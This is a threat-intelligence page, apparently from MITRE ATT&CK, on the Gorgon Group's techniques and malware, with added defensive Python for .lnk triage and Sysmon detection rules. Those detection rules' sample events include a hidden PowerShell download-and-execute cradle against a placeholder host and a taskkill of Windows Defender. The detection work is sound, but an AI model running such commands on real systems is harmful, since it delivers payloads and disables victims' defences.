
Gorgon Group

Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States.(Citation: Unit 42 Gorgon Group Aug 2018)
ID: G0078
Version: 1.5
Created: 17 Oct 2018
Last Modified: 25 Apr 2025

Techniques Used

Domain ID Name Use

Enterprise T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1547.009 Boot or Logon Autostart Execution: Shortcut Modification

Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence.(Citation: Unit 42 Gorgon Group Aug 2018)
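The persistence described in the two entries above rests on a .lnk file, dropped in the Startup folder or pointed to by a Run key value, that launches an interpreter with its window kept out of sight. The script below is an added example for triaging such shortcuts; it is not code from the original page, from MITRE or from Unit 42. It parses the MS-SHLLINK header, skips the ID list, reads LocalBasePath from LinkInfo and the StringData fields, then flags shortcuts whose target or arguments name a script interpreter, whose ShowCommand is SW_SHOWMINNOACTIVE, or whose argument string is unusually long. The build_lnk() helper, the two sample shortcuts, the interpreter list and the 200-character threshold are this example's own choices.

```python
"""Triage of Windows shortcut (.lnk) files used for Startup-folder persistence.

Added example, not code from the original page, MITRE or Unit 42. It parses
the MS-SHLLINK header, skips the ID list, pulls LocalBasePath from LinkInfo
and reads the StringData fields, then scores the result. build_lnk() makes
a constructed sample so the example runs without a real shortcut.
"""
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7          # ShowCommand value that keeps the launched window minimised and unfocused
# Interpreter / LOLBin names this example treats as suspicious in a Startup shortcut (own choice)
INTERPRETER_RE = re.compile(r"(?i)\b(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\b")


def _string(buf, off, unicode):
    """One StringData item: uint16 CountCharacters followed by the characters."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("cp1252", errors="replace"), off + count


def parse_lnk(buf):
    """Return the triage-relevant fields of a shell link; raises ValueError on a non-.lnk buffer."""
    hdr_size, clsid, flags = struct.unpack_from("<I16sI", buf, 0)
    if hdr_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a shell link file")
    info = {"flags": flags, "show_command": struct.unpack_from("<I", buf, 0x3C)[0]}
    off = HEADER_SIZE
    if flags & HAS_ID_LIST:                       # IDListSize (uint16) followed by IDList bytes
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize, HeaderSize, LinkInfoFlags, VolumeIDOffset, LocalBasePathOffset
        size, _, li_flags, _, lbp_off = struct.unpack_from("<IIIII", buf, off)
        if li_flags & 0x1:                        # VolumeIDAndLocalBasePath: NUL-terminated ANSI path, offset from LinkInfo start
            start = off + lbp_off
            info["local_base_path"] = buf[start:buf.index(b"\x00", start)].decode("cp1252", errors="replace")
        off += size
    unicode = bool(flags & IS_UNICODE)
    for flag, key in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & flag:                          # StringData items appear in exactly this order
            info[key], off = _string(buf, off, unicode)
    return info


def triage_lnk(info):
    """Reasons a shortcut deserves a look; an empty list means nothing stood out."""
    reasons = []
    launch = " ".join(info.get(k, "") for k in ("local_base_path", "relative_path", "arguments"))
    if INTERPRETER_RE.search(launch):
        reasons.append("target or arguments invoke a script interpreter / LOLBin")
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE (window minimised and not activated)")
    if len(info.get("arguments", "")) > 200:
        reasons.append("argument string longer than 200 characters")
    return reasons


def build_lnk(relative_path, arguments, show_command=1):
    """Constructed sample for this example: header + RelativePath + Arguments, Unicode strings."""
    flags = IS_UNICODE | HAS_RELATIVE_PATH | HAS_ARGUMENTS
    header = struct.pack("<I16sIIQQQIiIHHII", HEADER_SIZE, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def item(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + item(relative_path) + item(arguments)


if __name__ == "__main__":
    evil = build_lnk(r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                     "-NoP -NonI -W Hidden -ep bypass -c iex($env:x)", show_command=SW_SHOWMINNOACTIVE)
    benign = build_lnk(r"..\..\Program Files\App\app.exe", "", show_command=1)
    for name, data in (("evil", evil), ("benign", benign)):
        print(name, triage_lnk(parse_lnk(data)))
```

On a live host, feed parse_lnk the bytes of every *.lnk under the per-user and all-users Startup folders and of any Run key value that ends in .lnk. Real shortcuts usually carry the target in the ID list and LinkInfo rather than in RelativePath, which is why the parser reads LocalBasePath even though it skips the rest of LinkInfo.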

Enterprise T1059.001 Command and Scripting Interpreter: PowerShell

Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059.003 Command and Scripting Interpreter: Windows Command Shell

Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1059.005 Command and Scripting Interpreter: Visual Basic

Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1564.003 Hide Artifacts: Hidden Window

Gorgon Group has concealed PowerShell windows by passing -W Hidden, that is, setting the WindowStyle parameter to hidden.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1562.001 Impair Defenses: Disable or Modify Tools

Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the taskkill command.(Citation: Unit 42 Gorgon Group Aug 2018)
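The PowerShell, cmd.exe, hidden-window and taskkill behaviours in the entries above, together with the macro execution listed under T1059.005, all surface in one telemetry source: process-creation events with their command lines. The rules below are an added example, not code from the original page, from MITRE or from Unit 42; they run over constructed Sysmon Event ID 1 style records embedded in the block. The process-name sets, regexes and sample command lines are this example's own choices, and the Windows Defender process names, while the usual ones, are not an exhaustive list.

```python
"""Command-line detection rules for the tradecraft described on this page,
run over constructed Sysmon Event ID 1 (process creation) records.

Added example, not code from the original page, MITRE or Unit 42; the
process-name sets, regexes and sample events are this example's own.
"""
import re
from ntpath import basename   # handles backslash paths on any platform

# Process-name sets (own choice; the Defender list is the usual names, not exhaustive)
DEFENDER = {"msmpeng.exe", "msascui.exe", "msascuil.exe", "nissrv.exe", "mpcmdrun.exe"}
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}

DOWNLOAD_RE = re.compile(r"(?i)(downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b|"
                         r"\bwget\b|\bcurl\b|net\.webclient|start-bitstransfer|bitsadmin|certutil[^;]*urlcache)")
# A launch verb followed, within the same statement, by a document extension: the decoy pattern
DECOY_RE = re.compile(r"(?i)\b(start-process|saps|start|invoke-item)\b[^;|]*\.(docx?|xlsx?|pptx?|pdf|rtf)\b")


def hidden_window(cmdline):
    """True if a PowerShell invocation sets WindowStyle to Hidden.

    powershell.exe accepts any prefix of the parameter name (-w, -win, -windowstyle),
    so the name is matched by prefix. The value is matched by prefix too (h, hid, hidden)
    on purpose: a loose net that flags abbreviated spellings whether or not a given
    PowerShell build accepts them."""
    if not re.search(r"(?i)powershell|pwsh", cmdline):
        return False
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        if tok[0] not in "-/":
            continue
        name = tok.lstrip("-/").lower()
        value = toks[i + 1].strip("\"'").lower()
        if name and "windowstyle".startswith(name) and value and "hidden".startswith(value):
            return True
    return False


def taskkill_targets(cmdline):
    """Image names passed to taskkill via /IM, lower-cased."""
    toks = cmdline.split()
    return {toks[i + 1].strip("\"'").lower() for i, t in enumerate(toks[:-1]) if t.lower() in ("/im", "-im")}


def detect(events):
    """Apply every rule to every event; returns one hit dict per (event, rule) match."""
    hits = []
    for ev in events:
        pid, cl = ev["ProcessId"], ev["CommandLine"]
        image = basename(ev["Image"]).lower()
        parent = basename(ev["ParentImage"]).lower()
        if parent in OFFICE and image in INTERPRETERS:          # macro in a spearphishing attachment (T1059.005 / T1566.001)
            hits.append({"pid": pid, "rule": "office_spawns_interpreter", "detail": f"{parent} -> {image}"})
        if hidden_window(cl):                                    # T1564.003
            hits.append({"pid": pid, "rule": "hidden_window", "detail": cl})
        m = DOWNLOAD_RE.search(cl)                               # download-and-execute via PowerShell/cmd (T1059.001/.003)
        if m:
            hits.append({"pid": pid, "rule": "download_cradle", "detail": m.group(0)})
        m = DECOY_RE.search(cl)                                  # decoy document opened for the victim
        if m:
            hits.append({"pid": pid, "rule": "decoy_document", "detail": m.group(0)})
        if image == "taskkill.exe" or cl.lower().startswith("taskkill"):   # T1562.001
            bad = taskkill_targets(cl) & (DEFENDER | OFFICE)
            if bad:
                hits.append({"pid": pid, "rule": "taskkill_security_or_office", "detail": ", ".join(sorted(bad))})
    return hits


# Constructed Sysmon Event ID 1 style records for this example; not real telemetry
EVENTS = [
    {"ProcessId": 1301, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -NoP -NonI -w hid -ep bypass -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/a.exe','C:\\Users\\Public\\a.exe');"
                    "Start-Process C:\\Users\\Public\\a.exe;Start-Process C:\\Users\\Public\\invoice.docx"},
    {"ProcessId": 1302, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /f /im MSASCuiL.exe /im winword.exe"},
    {"ProcessId": 1303, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"ProcessId": 1304, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\taskkill.exe",
     "CommandLine": "taskkill /im notepad.exe"},
]

if __name__ == "__main__":
    for h in detect(EVENTS):
        print(h["pid"], h["rule"], h["detail"][:80])
```

The first sample event trips four rules at once (Office parent, hidden window, download cradle, decoy document), the second only the taskkill rule, and the two benign events none; the combination on a single process is what separates this tradecraft from an administrator's scheduled script. Wiring the rules to real Sysmon or Windows Security 4688 data only requires mapping the Image, ParentImage and CommandLine fields.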

Enterprise T1588.002 Obtain Capabilities: Tool

Gorgon Group has obtained and used tools such as QuasarRAT and Remcos.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1566.001 Phishing: Spearphishing Attachment

Gorgon Group sent emails to victims with malicious Microsoft Office documents attached.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1055.002 Process Injection: Portable Executable Injection

Gorgon Group malware can download a remote access tool, ShiftyBug, and inject it into another process.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1055.012 Process Injection: Process Hollowing

Gorgon Group malware can use process hollowing to inject one of its trojans into another process.(Citation: Unit 42 Gorgon Group Aug 2018)

Enterprise T1204.002 User Execution: Malicious File

Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.(Citation: Unit 42 Gorgon Group Aug 2018)

Software

ID Name References Techniques

S0332 Remcos
References: (Citation: Fortinet Remcos Feb 2017) (Citation: Riskiq Remcos Jan 2018) (Citation: Talos Remcos Aug 2018) (Citation: Unit 42 Gorgon Group Aug 2018)
Techniques: Screen Capture, Keylogging, Audio Capture, Bypass User Account Control, System Checks, Clipboard Data, Process Injection, Modify Registry, Video Capture, Proxy, File and Directory Discovery, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Python, Windows Command Shell, Ingress Tool Transfer

S0336 NanoCore
References: (Citation: Cofense NanoCore Mar 2018) (Citation: DigiTrust NanoCore Jan 2017) (Citation: PaloAlto NanoCore Feb 2016) (Citation: Unit 42 Gorgon Group Aug 2018)
Techniques: Keylogging, Audio Capture, Symmetric Cryptography, Disable or Modify System Firewall, Modify Registry, Video Capture, System Network Configuration Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Uncommonly Used Port, Windows Command Shell, Visual Basic, Ingress Tool Transfer

S0385 njRAT
References: (Citation: Bladabindi) (Citation: Fidelis njRAT June 2013) (Citation: FireEye Njw0rm Aug 2013) (Citation: LV) (Citation: Njw0rm) (Citation: Trend Micro njRAT 2018) (Citation: Unit 42 Gorgon Group Aug 2018)
Techniques: Screen Capture, System Owner/User Discovery, Standard Encoding, Keylogging, Encrypted/Encoded File, Fast Flux DNS, Peripheral Device Discovery, System Information Discovery, Native API, Replication Through Removable Media, Data from Local System, Application Window Discovery, Disable or Modify System Firewall, Modify Registry, Credentials from Web Browsers, Video Capture, Indicator Removal, File and Directory Discovery, Process Discovery, Exfiltration Over C2 Channel, PowerShell, Registry Run Keys / Startup Folder, Non-Standard Port, Query Registry, Compile After Delivery, Uncommonly Used Port, Windows Command Shell, Clear Persistence, File Deletion, Web Protocols, Remote System Discovery, Ingress Tool Transfer, Remote Desktop Protocol, Custom Command and Control Protocol

S0262 QuasarRAT
References: (Citation: GitHub QuasarRAT) (Citation: Securelist APT10 March 2021) (Citation: TrendMicro Patchwork Dec 2017) (Citation: Unit 42 Gorgon Group Aug 2018) (Citation: Volexity Patchwork June 2018) (Citation: xRAT)
Techniques: Scheduled Task, System Owner/User Discovery, Keylogging, Bypass User Account Control, Symmetric Cryptography, Code Signing, System Information Discovery, Data from Local System, Credentials from Password Stores, Modify Registry, Credentials from Web Browsers, Video Capture, System Network Configuration Discovery, Proxy, Credentials In Files, Registry Run Keys / Startup Folder, Non-Standard Port, Non-Application Layer Protocol, System Location Discovery, Hidden Window, Windows Command Shell, Ingress Tool Transfer, Remote Desktop Protocol, Hidden Files and Directories
